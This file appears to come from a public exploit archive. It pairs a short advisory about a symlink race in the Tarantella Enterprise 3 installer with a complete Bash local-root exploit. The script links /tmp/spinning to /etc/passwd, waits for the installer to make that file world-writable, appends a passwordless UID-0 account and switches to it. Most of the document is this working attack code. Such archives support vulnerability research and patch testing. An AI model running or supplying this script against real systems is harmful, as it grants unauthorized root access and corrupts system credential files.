32 lines
No EOL
1,008 B
Bash
Executable file
32 lines
No EOL
1,008 B
Bash
Executable file
source: https://www.securityfocus.com/bid/4115/info
|
|
|
|
Tarantella Enterprise 3 contains a locally exploitable symbolic link vulnerability during it's installation procedure.
|
|
|
|
This vulnerability can be exploited to elevate privileges. An attacker anticipating the install of Tarantella could create a symbolic link to any file as '/tmp/spinning'. When the installation utility is run, the file pointed to by the link will be made world writeable.
|
|
|
|
The attacker may gain root privileges by overwriting a file such as '/etc/passwd'.
|
|
|
|
#!/bin/bash
|
|
#Larry W. Cashdollar lwc@vapid.dhs.org
|
|
#http://vapid.dhs.org
|
|
#Tarantella Enterprise 3 symlink local root Installation exploit
|
|
#For educational purposes only.
|
|
#tested on Linux. run and wait.
|
|
|
|
|
|
echo "Creating symlink."
|
|
|
|
/bin/ln -s /etc/passwd /tmp/spinning
|
|
|
|
echo "Waiting for tarantella installation."
|
|
|
|
while true
|
|
do
|
|
echo -n .
|
|
if [ -w /etc/passwd ]
|
|
then
|
|
echo "tarexp::0:0:Tarantella Exploit:/:/bin/bash" >> /etc/passwd
|
|
su - tarexp
|
|
exit
|
|
fi
|
|
done |